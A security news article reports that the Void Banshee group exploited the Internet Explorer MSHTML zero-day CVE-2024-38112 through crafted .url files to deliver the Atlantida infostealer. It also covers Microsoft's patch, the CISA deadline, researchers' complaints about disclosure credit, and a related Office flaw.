Void Banshee, an APT group, has exploited a zero-day vulnerability in Internet Explorer (IE) to target Windows users, despite IE being retired. This significant threat has led to immediate action by Microsoft and security researchers.
Short Summary to Void Banshee Exploits Zero-Day IE Vulnerability to Attack Windows Users:
- Zero-day vulnerability CVE-2024-38112 exploited by Void Banshee.
- Uses MSHTML in Internet Explorer to execute malicious files.
- Microsoft has issued a patch; users and admins urged to update promptly.
A sophisticated group known as Void Banshee has taken advantage of a zero-day vulnerability—tracked as CVE-2024-38112—in the MSHTML platform of Internet Explorer (IE) to target Windows users.
This vulnerability, which has now been patched by Microsoft, enabled attackers to execute remote code by exploiting a flaw in how IE handles Internet Shortcut files.
The vulnerability was first identified by Check Point researcher Haifei Li. “Check Point Research recently discovered that threat actors have been using novel tricks to lure Windows users for remote code execution.
Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL,” Li explained.
These .url files appeared benign to most users but were specially crafted to exploit the MSHTML: URI handler, thus forcing Internet Explorer to open the attacker-controlled website. Using IE, which is less secure than modern browsers like Chrome or Edge, provided attackers with a significant foothold to exploit the victim’s system.
“The attacker gained significant advantages in exploiting the victim’s computer, although the computer is running the modern Windows 10/11 operating system,” Li added.
This scheme involves tricking victims into clicking on links that masked their true nature through successive pop-up warnings. Seemingly ordinary files disguised as PDFs were actually malicious HTML application files (HTA) that, when executed, allowed for remote code execution (RCE).
“For example, if the attacker has an IE zero-day exploit—which is much easier to find compared to Chrome/Edge—the attacker could attack the victim to gain remote code execution immediately,” Li noted.
Check Point’s investigation revealed that Void Banshee had been employing these malicious techniques since early January 2023, with the latest exploits observed as recently as May 13, 2024. This indicates a prolonged and potentially widespread campaign.
Microsoft was informed about the vulnerability in May 2024 and has since released a patch. Admins and users are strongly encouraged to apply the update without delay. The patch prevents URL files from triggering the MHTML: URI handler, mitigating the threat.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has prioritized this patch, adding CVE-2024-38112 to its Known Exploited Vulnerabilities (KEV) catalog and urging federal agencies to apply the fix by July 30.
This issue underscores a broader tension between researchers and large tech vendors like Microsoft regarding coordinated vulnerability disclosure.
While the update has been welcomed, Dustin Childs, head of threat awareness at Trend Micro’s Zero Day Initiative (ZDI), expressed frustration over a lack of recognition and communication from Microsoft.
“They’re saying what we reported was a defense-in-depth fix only, but they won’t tell us what that defense-in-depth fix really is,” Childs mentioned in an interview with The Register.
Trend Micro dubbed the cybercrime group behind these exploits as Void Banshee and identified their targets in North America, Europe, and Southeast Asia. The primary malware used, Atlantida, aimed to steal sensitive information, particularly cryptocurrency wallets.
“These threat actors found a way to resurrect a zombie Internet Explorer. They were able to get Internet Explorer to then go out and download an info-stealer, and really they’re looking for cryptocurrency wallets,” Childs explained.
Another security expert, Mike Walters, Co-Founder of Action1, emphasized the potential reach and impact due to the widespread use of the MSHTML platform. “Given the extensive use of MSHTML across numerous applications, the potential reach and impact of this vulnerability are substantial, affecting a broad user base,” Walters warned.
Walters stressed that attackers could use CVE-2024-38112 for malicious purposes, such as “redirecting users to cloned banking or e-commerce sites to steal credentials and financial information, conducting corporate espionage, and causing widespread damage.”
Adding to the complex aftermath, Microsoft faced criticism for not crediting ZDI for the discovery. Initially, the advisory solely credited Check Point Research, with ZDI’s input being undervalued as a “defense-in-depth fix.”
This highlights ongoing issues in the vulnerability disclosure process, where researchers feel sidelined after reporting critical vulnerabilities.
Satnam Narang, Senior Staff Research Engineer at Tenable, pointed out that the complexity required for a successful attack is high, but this had not deterred attackers. “It could be exploited by an unauthenticated, remote attacker if they convince a potential target to open a malicious file,” Narang explained.
Despite the patch, this incident has reignited discussions on the responsibility of vendors in carefully handling and crediting security research. According to Childs, “Researchers are left in a lurch.
We don’t know what’s going on, and we’re often not credited properly. They spell our names wrong, and we’re giving them bugs for free.”
Furthermore, this event has drawn attention to other critical vulnerabilities, such as CVE-2024-38021, a Microsoft Office flaw that also requires urgent patching. Researchers at Morphisec highlight its potential severity, emphasizing that it could lead to RCE without user interaction.
Morphisec researchers warn, “Given its zero-click nature (for trusted senders) and lack of authentication requirements, it should be considered critical.”
While Microsoft has patched CVE-2024-38112 and improved documentation crediting the involved parties, the broader industry challenge remains.
Transparency and coordinated disclosure are vital to maintaining trust and security in digital ecosystems. Enhanced communication between researchers and vendors is necessary to prevent similar issues in the future.
Ultimately, timely patch application by users and administrators and robust vulnerability management are critical to protecting against such sophisticated exploits. The ongoing collaboration and acknowledgment between security researchers and vendors are essential to fortifying defenses against evolving cyber threats.
